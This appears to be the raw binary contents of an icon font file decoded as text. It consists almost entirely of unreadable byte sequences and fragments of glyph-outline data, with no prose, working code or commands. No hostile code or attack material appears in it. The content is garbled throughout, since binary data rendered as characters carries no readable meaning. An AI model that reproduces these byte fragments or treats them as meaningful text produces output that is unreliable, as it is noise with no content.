BA		[

[[[

[[[O[THpphh--���|zpwpwtrhoholjfe`^ZXUSQOLJGFA?-:-96410)'%#,,+2#"'#"'#"&54?&547&=326327626=3264&#%64'&#"54&"3264&+5#";32?265+6;547;54&"#"�3J%% -�
&;2#%%13J%')�	&92"$%�@"Sk

�"�B��=��",�'o�"Q�Jf%%#09&
�.!&%J34%'#.5&�-$%��S"
"

�B�"���"�#�G^)*`
, �"�T���y#1Fp@mF	B

j

jhi[\	[		O		T	HCB?=:843/-*(%$!
+3"&=#"&4?#"&4>"&=32+2#"&46;546232+5462X�"��=G"�Sf"�S`"�B�"�G�#�"T�"Tl�"T�#�"�B���P�]ciou�@�0( tl;
h`VNFBh	hO[
Z


Y[SGppddpupusrnmkjdidigfba_^XWTRJHED?=9721.,$"]]'%+#"'&476322?'&#"#53264/32?#764'&#"32764/3'&#"764&#"53'#634%25'35#&5"'��w!"�w�"!�
��

6�6��6�6

��

6�6��6�6
75��55gE�x�E���
��

"6�6#��#6�6"

��

"6�6#��#6�6"
T55�55���D�@%B=5.@?K�
PX@-	j^`i
M
RFK�PX@.	j^hi
M
RF@-	jjhi
M
RFYY@DC?>;9%#+#"'&4?#762'&4625##"/76235"&4?#"/3'&462v��

6�6#��#6�5

��#5�6#��6�6#ƚ�

"6�6#��#6�6"

��"6�6#��#6�6"�8�y@d��@�Y-Q

cxG	
BA[[

[

[\		[[OTH! ����|zvtomjg^[WULIEC<9640/+*&$ @!?	+2+"'#"&57.546;276264&+764&"264/32+"3%4632>;2654&'#"/+"&64&+";32?'&#"#"&46;2q3JZv�y*0#x%43JZw�y)0#y$^VznMW5"��"5W+=I4*��1"#�	**"1
1"#�	*)#1
})V{oMW6

��

6W+=I4)yJ3�gy� x%J3�fy� y$��{�z6#��#6IhI"�"1�1#/"1�1"/�"z�{6"

��

"6IhI���y=�@
#BK�
PX@7^`^_	
\OTH@7jhfk	
\OTHY@;9641/,*&%! 	
+2#"&463264&+"/76262"&4?#"&4632#";'&2MozV4I>+V5"��"5��"��"5VMozV4I>+V5�z�z"IhI6#��#6���#6z�z"IhI6��%N3E@B+B[[[OSG.-)($"33#(	+"&54>7#"&46;.54762	"3!2?'&"�fJ
�4II4�$#k#)�����#��#�KJ3	
	IhI	
	4$##���R"�"������')@&BjkOTH$%+62	"'&4?!"&5463!'&4?D��FB��#01".B��EB1"#1BE\�)@&BjkOTH#$$+62#"&4?!"&463!'&�#��`��<`���#_"_���y2J�@'
DB7BK�
PX@7^`^		_\OT
H@7jhf		k\OT
HY@HFA?;9541/+)%$ 
+"&46;2&#+"&46;26?>;'&462#"&4?#"62#"&4?#"'67;'&*�I5 -�p:hhH�GL5#��5L+\�#��5a_>>'a5�"7**�:Pk"J8;Ok6#��#6Nq��#6P*1'16��
@?a
	+2	&463�
����� 
��"��@@a
+7"&547	#*
���
 � Bg��@	_V�kys;3BK�
PX@E		`	fh^		[

[[OTH@G		h	fhf		[

[[OTHY@ihwuh�i�ca/&$.&."
+4632#"/&'&54767&67654'&#"764&#"3264'3264'.5476732?'&#""&'76327654.7�J34%�ot6@I34%�ot6@�wW[V"C<S4��XwU\V"C=S5

��

!07b"!078b�3J%�	o��t53J%�	o��t6�MW[�tV#"A,_C<4#��#�U\�tV#"@-_C=6"

��

"��- 7N$1)a- 7M$28*b�bq� C�@@7BK�
PX@4^hh_\OSG@2jhhk\OSGY@
$)$+#"/76267654&'&462#"'&54767'&462#"'&4?q\Wv8��#4S<C"#V��"V\Uw7#��

5S=C�\W7#��#4<C_,A"#Vu,A"#Vt�\U7"��

"6=C���
$@!@?ja
	+"&47	#2	&5463*

����V"��
 T 
������)3@0B#@[OSG+"&=&'&47	'265264/27�hI$e"%%()%%"f$�"�#��#KI4� "%g%)��%g%" �4�q��#��#����H�@@ja%+	"/#"&5"&47$2DB1"#1BD2���D2B��#01".B2D2�7@@ja+"/"&5"&47��"`"`#7�#`��<`#���y1;L@I
	B[

[	[OTH32862;3;'#"#"%+ #"'#"&463263226=4&"3276#"&264&#"��I4>&-@<UU</'
"�Γ�gN?"Si��M%%%%yÊ4I22VxV}h��В+
"
9��%2%$4$���4CN@K3Bhf[[OSG65=<5C6C&%&	+"&54?632"'&4?&52764&#"32?654'2"&5476@�!#1�1D"1b�1&1bED1�>*+Y��h�I��IВI'I
	�F1�1F&2!1�b1'1�b1�*+>X#"���hgI��I�hgI'I��t=1A@>+B[[OSG)(#"
11+7"&54?62#"&4?27>764'&"2?�*>�1�b1��1DEb1!0F1�1E��X�=+,�1b�1��1b�1!1'F01�1F��"!Y��jP*CA@>?92+Bh[OSG640.&#
+!"&'.'&4?>3!23!2654&#!"#"/#"&?'&>76�_-_i�_-�4II�;c<��_<^�o

nn

nn	
nnK0%%�%�%1I4�_4IM&��"�"n
nn
no	nn��@P4:@7-$B[OSG1/+) 	+2#!"&/&7>7>3'764&"'&"32?32764�+==+�_(U�

iV(A__#_`#``

`_

P=+�_+=, �%�% -�h_`#``#`_#

__

#�	/:@7	B[[OSG5552+!!?'7%2##!"&=463!254&#!"3!26}�6�l1�n�#12"I4�64II4�4IS�6��.aOa}1"S#14II4�4II����#/EU@@=[	
[


O

S

GTQLIDA<976+$"&=462"&=462"&=462"&=46272##!"&=463!254&#!"3!265""�""_""�""�#12"I4�64II4�4IS�6�����������1"S#14II4�4II����#9I:@7	
	
[[OSGHE@=852+$"&=462"&=462"&=46272##!"&=463!254&#!"3!265""�""�""�#12"I4�64II4�4IS�6���������1"S#14II4�4II����!1/@,[[OSG5552+6"&=462%2##!"&=463!254&#!"3!26�""�#12"I4�64II4�4IS�6�����1"S#14II4�4II����-=4@1[	[		O		S	G<9552
+$"&=462"&=462%2##!"&=463!254&#!"3!265""�""�#12"I4�64II4�4IS�6�������1"S#14II4�4II�����qP+7@4[[OSG! '$ +!*#3%2	+%#!"&767#"&463!2+7!2/#!"'3q@5�_5@g0�1W�+M&2��1d6OO6|""��������#<K[e}@zD
T
B		Y

M
[

[[[OSG==%$dba_ZWSQPONM=K=KJIB@961.,*$<%<+7"&=462"&=462"&=46272+#!"&5463!2%32?6?35###"'3!26754&+326�

T



S



�<VV<I4��4I0#w#1�5%$��/ 3$$�%>>%p�

��

��

�V<�<V4II4"11"**?% 
*���)*�t��%��%����%05;Q@NB
[		Y[OSG21'&:976431525,+&0'0""+%+"&'#"&7>5467'462"!&54&27#'!&'!��ZrY�
]J0F1J^
��EaUbD1�����O27FF74
.7]4Q�"11"�Q4]8-�aE1#+)Ea��))}4II����&5O@L
[	[		[OSG42/-,*%#" 
+2+#!"&54?633#%4&#!!2674&#!!2326q4I<,
A(��4I}**T���$}�G*f4I�I4�_4I$/I4�}�e�_*w�5d�*I4����G�%2S@P-(!.'Bk	[[OSG20+*%$
+2#"/&"&'&5463"7624&#5'&"7632�4I'"�#� C
I4f,},fNx� \ �x$54�I4��)+��H4IT�c^))^��x`xx`x$���y'1=U@R[	
	[


[YOSG32962=3</,)(&# 25+2#!"&546346;2"!4&#5!3!26%!54&#!"2+"&463q4II4�4II4I4�4I��N������H�NT�I4��4II4#4I4II
�6))d�S""����!(-2@/-+)(&$"	BjOSG!!,(+#"/&76767%632267'767&'767�'l��

}U=	<6Z�#��9P+>I
�,C��Mƒ�'3��Sk	=eMEl�dG7+`A� C'$��M����y+7=In@k
[	[		[[

[OSG?>.," EC>I?I=<:941,7.7(% +"+
+!"&5463!2"3!2654&##"&46;2'#"&46;2742"2#"&546�e4II4�4II�1��_�������S-;<,/99!I4�4II4�`4IG�`���""�""TTS#$$
��G�'/7?GOW_gko�@�[YY	
[


[[OSGlllolonmkjihgeca_][YWUSQOMKIGECA?=;97531/-+)'%#!
+!"&5463!2"3!2654&#432#"7432#"7432#"432#"7432#"7432#"432#"7432#"7432#"#37!5��5HH5M5HH�~M��*))*}*))*}*))*�*))*}*))*}*))*�*))*}*))*}*))**��)��KH5�5HH5�5H����))**))**))*S))**))**))*S))**))**))*�)S}}����'3=Q^@[
B[

[
[	Y		O		S	G>>>Q>QNMKJHGEDBA<96+#!"&546754623462#26=4&"26=4&"5!3!2654&#"&5#"&5"�%.I4�4I.%IhITIhI�""��""��1D2�2D1
@(��4II4w(@
4II44II4SSSS����5S#11##11#S����'3=x�BK�
PX@*`[	Z		O		S	G@+h[	Z		O		S	GY@
<96
+#!"&546754623462#26=4&"26=4&"5!3!26�%.I4�4I.%IhITIhI�""��""��
@(��4II4w(@
4II44II4SSSS������Ay5=HRj@g[[

[
	
[		[OSGJINMIRJREC?>;:761.+(# 54	+!"&546;7>;232"3!2654&+"/&+"#"264&2#"&54%2"&546��4II4B*8�9)B4II��GS6�6�V>>V=�zTU<=U� .  !I4M4I**I4��4I���M66T=V==VgU=<VV<=b .  ��Ay$.I@Fh[[	O	TH+)&% $$	
+2#!"&546;7>;22654&"$264&#"�4II4��4II4B*8�9)�<UTzUU .  &I4��4II4M4I**�_V<=UU=<V�.  ����'/S@P( )B[	[[OSG,*&$
+ &6 "264%"654&'26327'#"&54����$������V<Mo��0\V<�04Nm6�$�������"�<V*oM4/�<V�nN5���y*@'
B[OSG(%+  &327654&#"�����}zV2.���{V1.y�����Vz.�00Vz����(4A@>B[[OSG+)1.)4+4('	+2#!"&=4?>764&#"/&!!"&463!2q4I�f�g'E\&e
t f
#
�	H)�f��K2�_}-!�&
5r/}�
M

�S�""���y)@&
@jOSG+!54?>7>2#!"&463�f�CftD�f&�_}�L���""����#+7m@jB[[[	
Y

O
S

G.,$$41,7.7$+$+('## 
+2!5463254626&"3454&"!4&"!"&463!24I�eI4/$IhI$�"S�"�"}��GPI4���4I!�4II4J!S�6��%��$��""����%;@8OOYOSG!%$##	+#4632#4632#54622#!"&463��1"#1Ч1#"1�_�0F0���y��#11��N"10���"11��""���y/;V@S
-"Bh[[OS	G20850;2;+) //
+7".6?>7632/"32?6?6&#"'&!"&463!2}%=�g'E[&<2H�f(F[&l
�
��
#
�
��
h��H\);I�&4q/EZ,�&
4q/w�.�e

�.�d	��""���O#*@'@jOSG#"+7.?>7>/#""&463!2#�CftD6�Cfu)
G�D�	M�,D�	M� �""����$(.A@>.*)(&%
BjhOTH$$"+"+46;"'#"&546727'&'654'1"��J\)Vc�ɕsOUF�_��o	t�	�JJ�"1rIl��s	8ʎw���4��al�7
a
�S�]uv]����@
	@a++%7'%#"&5467%46g�R:	!���May��j1�bO��g�m[��:�yn�"�;7
!���x!*@'B[OSG"+%#"'	62%2654/7654&"�J34$��)#k#$$xx$�x�#��#\3J$))##$54$xx$�����P@BOSG+"'	62���2D��F7D��D2���x!3@0 B[OSG+"&4?'&54762	"2?'}3J%xx%%#j#)��$#"
��

"��!Jf%xx%34%##���$G
��

�����P@BOSG+62	"&4?'&4F��D2��7����2D��D����3?KWt@q[
[

[
	
[		[OSGNLB@64TQLWNWHE@KBK<94?6?2/*(%"	+2#!"&5463;26=4&++"&=#"3!26'!"5463!2'!"&543!2'!"5463!24II4�_4II4S�}*0#�"1*�S��	M	��	M	��	M	�I4�4II4�4IS**���*"11"*�;		}		}		AP+C@@$Bh[OTH)'	+++2+532764/.32?#"&546754632qVzzV�6

}$}

6�EbF7�gP��z�{�5

"}}"

5�bE:Yh�]KLP@Z@W?/Bh	f[[
O
SG=;31.,(&!@@(3+2#!"&546754632264&#"'.#"'";5#"&?6#"/{V{{V�6FkL'�hR�4IH4-\=Ea
; /0#�Y	

}}

	Y�z�{cD5Zg�^J��IhI-<OaE22"#0�Z
}		}
Z���-<N@K:3+#B
[OS	G/.87.</<)(--+%"/762'264/764&""&4?'&4762"2?'&.4%��#k#%%$$%J�#__#y3J%%%%%#k#��%4__#��%��##%g%%$%gJ��#_`#�kJg%$%%g%##��%�#`_#��2%�%@"BOSG+$"/762"'&4?'&4762F��EBB'FBBE��2��DBBDDBBD���P(T@Q
[[[OS	G! 
'% (!(

+%!"&463!22+#!"&5!%2654&+��<VV<2"��"1����%%>""HVxVS#11#w��#�ݦ%%}���KS[w@tG

= 	
	3*BY
	
[		[[MSGYXUTQPMLEC750-(&KJ
+#'7377'7''27632#"/+"&/#"/&6?'.?6327>3"264&2"&4�}$�?jj?�$}#�>jj>�#-;0>,,>0;-}-:0?,,?0:-aF00F1�hIIhIP�)mffl(��(lffm)�#;*l8+*8m);##;*l9**9l*;#��0F01D[IhIIh��>PGQ*@'[OSGIHNLHQIQEB!+7.&/&6?64/.?>6?>;2?6/&+"&'"3264&�=$--
$=)=$-
-$=)I#11#"11E$&,",&%==%&,",&$>c1D10F0����!2@/! Bh[OSG*+"264$  &%6#"&?677'���A6����H�
H#ɐP�������6�H
��9����'-15;EMY�@�		[[[

[[[OSGON22..USNYOYMKIGDBA?;:98252543.1.10/,+*)#!	'&+2#!"&=#"&46;5#"&46;5#"&46;546335"353535#4&#!!26432#"2#"&546�4II4�54I))))))I4)))))))�_���STTSS-;<,/99�I4�4II4*"S"S"*4I}*T�SS�SS�T*���ITTS#$$����#+L@I[	Y
[OSG%$)&$+%*## 	+2#!"&54635!3!2654&#!""4;2#G4II4�64II4����6wT�I4��4II4#4I�`��))�**����.@+
	?kYMQE+!%73?!7!7!p~:5����}���������xx�CGG��W��G�
 (H@E	'$B[[[OSG$+"&57>22675#"'"264267"'G������qVz{V�{{�z��nQ�Q���y��yt���J<XX<�z�{{���UBXXB����'5@2#Bh[OSG$&+  &264&"%#"/#"&?'&676�6������Ao

	nn	

oonn�����6�A���yn
oo
nnoo���y'/@, 	B[OSG$)+  &'764&"'&"32?32764������``#`_#__

_`

y�����``"__"``"

__

"����#3CGl@i
[

Y
	
[		[OSGDD54  DGDGFE=:4C5B2/*' # #"!	+2+32#!"&46;5#"&54635#%4&#!"3!262#!"&5463!k4II4�}�}�4II4ʦ���T�f��f�I4�64IS""SI4�4I��SS���6���N��N������37CN@K
	B[Y
		[OSG9844?<8C9B474743;5+%#!"&54674&5463!23463!2354&#!"!264&#!"3�$0=+��+=0$I4H4I�(�)��G��

��

�9%+==+%9w4II4�����	w��*w�Nw��}



���59�K�PX@3`
[	Y		[OSG@4h
[	Y		[OSGY@"66! 696987/-+*(& 5!4	
+2#!"&54634&#!"3!262+"&5#"&5463#�4II4��4II4M��$S?">���I4�4II4�4I������w�_w������)9�K�PX@3	`[
Y[		O		S	G@4		h[
Y[		O		S	GY@"850-# )(


+2+"&5#"&5463!2#!"&54634&#!"3!26�"�w���4II4�64II4��6�y������I4��4II4q4I�q�����y!.<�@0		+BK�PX@/^k	\		[
O
SG@.jk	\		[
O
SGY@#"<952)&".#-#(!&++#'#"/7.546;546232264&#!"3%7'&#!"3!2�r&V<q!*!\7'kM&.V<�$4%y6'n%%��00n33�x%%��l+6<V��'kMG+<V%%%��%4$00�00%%����+7W@T[	[	

	
[[[OSG-," 30,7-6(% +"++"&462&"264"&462&"2647!"&463!2%"3!264&#�hIIhIl""
hIIhIl""�4II4�4II����IhIIh]""�TIhIIh^""�IhIIhI�""����:@7[[OSG
	!+432#432#463!2#!"�]^^]]^^��0#�#11#�#ȼ����6D11D1����-3Ee@b/B[


[[	[		O		S	G54..?=:84E5D.3.2,)$!
	+2+"&=#"&46;5462%#!"&5463!2'3265#"&=!"3�S"TT"
I4�_4II4MNl%>+=��,"TT"SS�
�_4II4�4I�k-%�5w=+?�����)5Q@NB[[
[	O	SG,*2/*5,5#!)(55+#!"&5463!2'3265#"&=!"3%#"&46;2�
I4�_4II4MNl%>+=��M���
�_4II4�4I�k-%�5w=+?��""����+7COs@p
[[	[		[

[OSGFD:8.," LIDOFO@=8C:C41,7.7(% +"+
+!"&5463!2"3!2654&#!"5463!2'!"&543!2!"&543!2!"5463!2�_4II4�4II�+�*��	M	��	M	��	M	��	M	KI4�4II4�4I����		}		�		}		����)@@=B[[OSG#!)(55+#!"&5463!2'3265#"&=!"3�
I4�_4II4MNl%>+=���
�_4II4�4I�k-%�5w=+?��b� *AHLl@i=6G/	Bh		f
		f[ZMSGIIBBILILKJBHBHFE%*$3+%#!"&5434?6;'&47>5462632764&"54&"'&#"!'#'5!��fT
%%H!IhI!H%%
T����#_"_
%ECFM�����\��	�%f%94II49%f%��#��"_��_
��Ў���}}����8E@BBj	hYOTH53$4%(
+'&46324627632#!"&5434?6;#!'#76732;��_"_��fT
	>8EBE8>	
T�#��#`��`����	�=��=�����@
	(+7'!'77'7'5�ݚ�ݚ�ݚ�ݚݚ�C��Cy����yy���l�y�O�-2��2-���*.N@K.-,+BjY[MTH**%%7+#!"&5463!762	'5+546?#7'���w�2��Z��G݅E��36[6B2�����Z��#E���!B��5�6[6���P(;�@80BK�
PX@6h^[		\[OSG@7hf[		\[OSGY@
65##$%#"%
+#"&'#"&5!23264/3264&#!265264&#""/�[s�zb�-#0�"1���ȇ��"��zzV'kDx	��bx�v[0#�1#��#�"����y�xkEx:V���y.M@J&Bhff	[[OSG.-$###
+$264&#"&4632"&54622+#"/"&5!*�nnMp���"Y���"Gn�o"��pM�"�#��&#/Q@N	[[[OS
G%$
+($/%. ##
+!"&463!2%"3!264&#!"&463!2%"3!264&#q�4II4�4II����4II4�4II���,IhIIhI�""�5IhIIhI�""2��0@-[OSG


+2#!"&4632#!"&463G#11#�#00#�#11#�#01"�1D10F0��1#"10F1���+A_@\	.+*&B8Ajh		Y\[MSGA@$&*%8
+#!"&5463!46267&/#"673!5#"&=54>35!5<��M4J`���O)&>* Zl)���1!�k%6Y8���#5=�G"1f�f��U�(96Q�}�1$}�0^`H-)���y+N@K
'%BAY[[MSG$#"! +*%#	+74>354632#"&="&5463!!!567#�%6Y8��Q�k}M���4 p0^`H-}��U}��GT�}6 ���
%-5?U@R B
[[	[		[OSG<;7632/.+*'&%%+"2767&/2#"'./>762"&4"&462&"2654Ŝ;>FD@;�;@DF>�jO0_	!d0OjkO0_	!c0OZ""^hIIhI[D10F0�*,QO-**-OQ,}9"a
+g"99"a
+g"9�""�IhIIh�1#"11"#��:&'15@2[[OSG0.+*#!'','+#"'.'&7>76322654&#"7"&4632:+d3ZwxZ3d+,d3[wv[3d,�l<UU<=UU�0F11#"1	8g$@@$g8		8f$AA$f8�V<=UU=<V�"11D21�b��EK@H3,(!<?
B*@hfOSGCB:81/%#+"&=.546?>7#"&?&'#"&?&'#"/#"/462j�î�"��ė*d~�	

�	[	

bM��Mb

	[	�

	�}d"�뙐�%33%㐙��#�k��=4[
bmmb
[4=��k�#�����g�@�!
	
[	
	Y"

[Y[[ Y[YOSG  	 g gdcba^]\[XWVURQNLKJIGDC@?>=:9874321.-*('&%#	#+!!%5#2+5##"&546;3554&+!5#"2#2#2#2#;5!326="&4635"&4635"&4635"&46�M��#�N4II4}�}4II4}��*��**M*��*���I4��4ISSI44ITT�*SS*"*"*"*"*TT*"*"*"*"���&@	?a+254&/&63s#�"�!�#&!�H�S�#R�!��G�(8O@L4-&%5,Bk[[[OSG&#	+6"'."&547622.675&75#"'.6323@�@%f("@�@(o�%f(6},'n-:�%f(+(P<'n-**Zc��@@% �@@(% _,'a�% _:'`��G�-@*BkO[SG+6"'."&5476223@�@%f("@�@(oc��@@% �@@(��G�%@"
	Bja+1'2#"&?'.76����h8�h"1J�#��!-0L�#8y��y�(xN1#�TS��L(�TR(����@
Bja)%+#"&?'.7632���Z�9
Y+
*��&�f
*(
�����2:BJ{@x
+Bh[		[
[

[[
[

O

S
GHGDC@?<;87430.*(&$!
22+%2#"&'#"&5.5462;>32#"&'#"';>"264"264264&"4II4(A
�V{$/IhI/$I4�
A(4II4(A
�C:I4�
A9""�G""f""�IhI/%zV+
A(4II4(A
4I$/IhI/$+~4I$/�""<""�~""����<DLT^@[5*
"B
		
hh	
	[[OSGRQNMJIFE(("(
+%"&546754&#"'#""&5467546326=.546232264&""264264&"G%/IhI/$$?**>%$/IhI/$V<%%/IhI/$%<U�%""""�""~
A(4II4(A
M%,,%M
A(4II4(A
M<V%?
A(4II4(A
?%V<�""�""�~""����'?GOH@E87,+B[	[
O
SGMLIHED+%"&5467.5462&"264264&""&5467.5462"264264&"G%/IhI/$$/IhI/%"":""�/$$/IhI/$$/IhIl"";""~
A(4II4(A
\
A(4II4(A
�""�~""Y(A
��
A(4II4(A
\
A(4II""�~""����-5W_g\@YR+&	)	AB
[		[
[OSGeda`]\YXVT'+7"&5467547264&".5462&'656"264"&5467.#"&'.546232"264264&"�$/IhI/$='%5;""�$/IhI/%?#)8;""&0IhI,$]<^�
&0IhI,$\<^��V""f""~
A(4II4(A
N7 6�""�
A(4II4(A
T<#@�""�A)4II4'@9L|\A)4II4'@9L}�""�~""���y6Rp@m[[	
O


[[OSG87ONKIFDA@=;7R8R20-+(&$!65	+2#!"&546;2265#"&46;4&+"&5#"32+3%2+"&=#"&46;5462q4II4�4II4�"1��

��#0��

�wS"SS"&I4��4II4�4I1"�#

1"S

���"TT"SS���y *6^@[[
[	Y	
	[OSG-+"!30+6-6&%!*")  	+2#!"&546;2#"!4&+"&5265!3%#"&46;2q4II4�4II4�"1�H�#0M��w��&I4��4II4�4I1"S1"�#���""��ky(6��2.BK�PX@0	`[[\OSG@1	h[[\OSGY@53,*'%# 	
+2#!"&546;232%>3!4&+"&5#"!"!26N\
[6�5HH5�"1�(@
�iC��#0�mK��	O�0���5HH5�5H1"-&)�}1"�a��%���y *M@J	[[Y
O
SG"!&%!*")  	+2#!"&546;2#"!4&+"&5265!3q4II4�4II4�"1�H�#0M��&I4��4II4�4I1"S1"�#��
����&*.2@NRY]d�@�
J6

F:
B


hh

[	YYOSG_^TS43++''cb^d_d]\[ZVUSYTYRQPONLEC=;3@4@210/+.+.-,'*'*)(" 
&&+2##!"&="&=46;&546326325#'35#3"3264&3275467.#"#33#;#26=#�I4�`4IbV<>**><V9�}TTT>!	%&��%	!.��}}��TT�����4II4�� <V,,V< �SS�))}S$%%2&&2%%�S��#�#���������:_@\3,9	B

jh[	[		[OSG/.'%#"::+"264$2"&42#!"&46;5"'&46232654/762Z�aa�b�����`��n#Uyz�UV#RnMh&b�aa������"")n#U�yzUU#f��nM3����*2Q@NBjh[[	O	SG21.-*)3+"
+5"'&46232654/76232#!"&463462"�n#Uyz�UV#RnMh��`T�Γ��!)n#U�yzUU"f��nM3""9Γ�Γ
���y!@IS^fp�@�?<[VHDRL2*	B1+A[[[
[[

[		[

O
S

GhgUTKJBA#"lkgphpdc`_ZXT^U^PNJSKSGEAIBI>=;953/-)'"@#@!!+$"&462&"264"&462'"264&2#"'#"&57#"&546326 62?&#"27.#"%27.#"$"&462'"2654&5�zz�{�hIIhI�X<<X=i%$4%%@RT>" �rx�(AQPBO*O
O*��0"
>N#�iD[>AZC�C"
5&= ��X<=V=h%%4$%�z�zz��IhIIh��=V==Vj%%%2&�6$!22!$6(AA(^	'0$$0
	w=V==Vj&2%%%���y.7X@U-* B[
	[		O[		S	G7521,+)'#!..
+"&462"&4622#"'#"&57#"&546326 6$"&4632�{�zz�`=X<<X,@RT>" �rx�(AQPBO*O
O*�<X<<,+��zz�z��V==V=�6$!22!$6(AA(�V==V=���y%.;GT\t@qC@	X-	YE<, B[Ah	[		[

[OSGUUU\U\SRMKGF(+"&=467.""&=47'546 34367'54&+26>?& 6254'#"26=4'�VxV.%`�`%.VxV�6�e*0%<}O%4$5*
`��`J:��O$4%<%1l
S<VV<S/KB]]BK/S<VV<S
l��ܛ))O<%O��S$#S%%�)
``J:�OS#$S%%�)aO%>M)��(y@Bja#"+4632>32"'.'&�[rE ]2^�S�zy�S�]�_,3�^�SlU		UlS��(y'8@5BhiOSG''#"+4632>32"'.'&%>7654&"�[rE ]2^�S�zy�S�<�!>RvS�]�_,3�^�SlU		UlSX��'|!>\;SS;��,y2?@<
"BhiOSG/.*(
+"'.'&54632>32"67654&#""&54�
]�U�]rDa7]�U�`
�tS=?��?=R:;R"!AsU~]�^,2�]~UsB
GR;[=?��?=[;RR;;���&@?a+4&"67654&"mk�jI$�BIj�jpLjjLnIژBInLjjL����"/F@C&@[Y	
M	
SG/.-,+*)($#""#3$++#!"&=#"&547>?5#3&'33533v1#)2"�"1*#0?Ȋ���M}����}}�}l("1�#11#�1"%5�vv��?��M����������A� @@jja#33&+++"&=#+"&5#"&47��T}�}S��x
����#"��G�%*:�@�

B621)?	
Y

Y
ZYYMQE+++:+:9843/.-,'&%%$#"! +#5373#5#5335#53#'#53353#5!'7!!/#?!'R*.**�d*:��&u%�**%**hG2�����STK
�����>}..}>.}T)S**S))}**})S��CC�G�`?y**�K��Ay	 3CGs@p

Y[
[

[[		YMSGDD"!DGDGFEB?:70.-+&%!3"3  $+"3264&2"&4"&#"!.'"72!>3232>%#!"&5463!2!(2&%%iV==V=�'H# #�,2+�%>

��,,J/%71"�e#00#�"1S�e�%%$4N<X<<X��*TDa8�}?>9,$)'/'�"11"�"11���A�&*�K�
PX@:``Y
[	Z		M		S	GK�PX@;h`Y
[	Z		M		S	G@<hhY
[	Z		M		S	GYY@!'''*'*)($!	
+4272!7>32327676%463!2#!"&5!!���!)��
=%+:'.��0#�"11"�e"1�eV��)1J*+R,4
�"11"�#11#����
*4?JUp@m)	
QF;0	B
[
	
	[
[OSGUSOMJHDB?=9742.-(&" **$#$"+4&#"'&#"32?3262#"'#"'&463262?'&#"4632#"$4&#"326#"/7632-kIK4:95KIkkIK4:94KJk�m�MNlmLLmlNM�mnKK��
>- 78!�	=,!78 Jj4875j�j4884kP��MNLLNMښKK�
A>-56=	A>,55R��&:@7$B[OSG&&#$	+<627632#"/""2?'64&"j�5::4JIkkIJ59;4�i>-,@77[,,?87��j5784j�j5784- ,65�,@,65���� *D[@X</Bhf[[	O	TH,+"!?=9720+D,D'%!*"*&
+%#"'&?&'&6767&5462"3264&26?#"&?6&#"632W(
Jb�0*4)
3Hb�a7- J#11#"11n;
%*#6H;%*#6�$<?bWg.$<+*/EbbE2S*q?�1D11D1��
	5'SI^

	6&SI_��M�'+8@5hf[OSG(((+(+')'&+%6#"'&?6'&#"&7>32326742
C"W &*
	
C"Y&*	��F?;KS,?;KS-z����"�8@N@K+B[[[OS	G
@><:0." 

+"3!26'&"&547632#''.?6'&>67432#"�'�#4�4#���C]�2VU2�3)+c�
,
,m7667:,�e,?@,�,�{L@-0�UU�eUJJ�1%3$2%3$776��3�=N@Khf	[[OTH;821*("!	
+"&547632#"3264&6&#'&?6&'&76332>�C]�2VU2�+c�&'%&,


 $.

!$+KLA-/�UU�e,1&J&&&4'��3)<3);ay'C[@X:,B	j[[[
O
TH)(=;8710(C)B
+2#!"&5463!6'&#"3676'.26="/&47627!"3�EL$I4��4II4$�U}
� ^)"}F/Z��yxA.��4II4N4I)h�U#}$�AϤ$}D/���GP#5L@I-Bhff[OTH+*%$
##+%!"&546;2+"3!26=462'"/&4627>��4II4��M"I�o .<�-(�I4N4I"��}}4I�o. ;�
-�����P (2�@	 BK�PX@>`^
[
	
[		[[MRF@@hf
[
	
[		[[MRFY@*)/.)2*2&%!#
+#57&5462++35353264&""264'2"&46����В�h?S�TS�Eaa�b�J""*"11D21K��$'h��ВTTSb�aaE$!�5""B1"#12D1��2&=@:Bhi[OSG#!#+462+##"&/57&264&#"�z�zzVhST*
��D21#"1VVzz�{SS?�)'2D11"#2A&#'+/39AQU�@�'!#!#Y
	Y
%Z& M$Z($""$M($$"S"$"GRRCB::44RURUTSKHBQCP:A:A@?>=<;494987653210/.-,+*)('&%$#"! )+!!'3#53##5353#3#73#3#73#3#73#3#73#53533#5352#!"&5463!�$��}SSSS}}}***)))******)))******)))****)))}*}"11"�e#00#��eSSS�*S*S*)*}*)*}*)*}*)*}*S*S}*)**)$0#��#00#N#0�_N���b��B.@+B=<6/)("!
B@OSG32+"&=.546?>54&'5'&>5'&>54627676Į�"��ė���f�vv��f�	
�c	
D"D	b��V��%33%㐙��&#�ny��ym�#}�	��b	D��D	
b�����q�
,0H�K�
PX@Ah

^_		[
[

ZMSGK�PX@Bh

f_		[
[

ZMSG@Ah

fk		[
[

ZMSGYY@$--GFCB?>75-0-0/.+)


+2"&54&#"4"&5#"&=4&/&546 +75#654&#"354623683I0"%"S$65��96#T*�*�_^�*R/".
;I3		"0*�P}HNO_����aRMG}d**2=G^��^F=u;TT9���y%HPx�@"5
]TL> 
qhP,

GBK�
PX@H

`

`[
[
\	
	
[O[SG@J

h

h[
[
\	
	
[O[SGY@&RQomfd[YQxRxNMJIFD9742'&%%+"'&"32?32?64/764'&"&54?&54?6327632#"'.'7232?#"/764'&#"'&54?6u
H
$n$�&&G

G
&65&�%%
H
�-jL&>�=Y4,%65L&?�>Y3.�"2L"1&



�


�&
H
$$�&65&
G
&H
&&�%l%
H&

�]M46&.2Y>�=%M47$01W?�>Q2"M1"�
&



�&


���P&#J�@!1)E<BK�
PX@0j`^k[OTH@2jhfk[OTHY@IG@>53-+##$*	+#"/#"'&4?'&54?6276654/#"&4?'&#"76323274G&&�&65&
H

H
%%�%m%
G
G





�



&&H
&j&�&&
H&
G
%76%�%%
H
��



&
�

&��r3@@a+"/&'&7%6M03�;9�!3���9�G>�20.�
!/�&6P9����$�
(+%/.67%6&9�
� �	�9	� �&
����
#+E@B?[[OSG)(%$##

	+"7654'&'2'&6"32764.2"&4MgJII��HHJh��a��bĉ*>+,>gxVVxVPHGfeG��FfgFHS���`��`��>UU>*VxVVx����/@,?kOSG
		
+'&62764&#"��a��bĉ,>+*>����`��`��KU>>U��Gy'+�K�PX@5`[Z
	[
		M
		S	G@6h[Z
	[
		M
		S	GY@%(( (+(+*)$#' '
+642232#!"&546;54676"354&!�l6Db*"11"�_#00#*/$&.#1�1��_&llSbDT1"��"11"$"1T0KS1"}}#0��$����Gy(H@Eh[	[OTH   ( (%#	
+2#!"&546;5462264&"54&#"�"11"�_#00#*b�a�,  , �1"#11"��"11"$"1TEaaET�� ,  ,}#01"}���y-1�K�PX@4`[	\
[

M

S
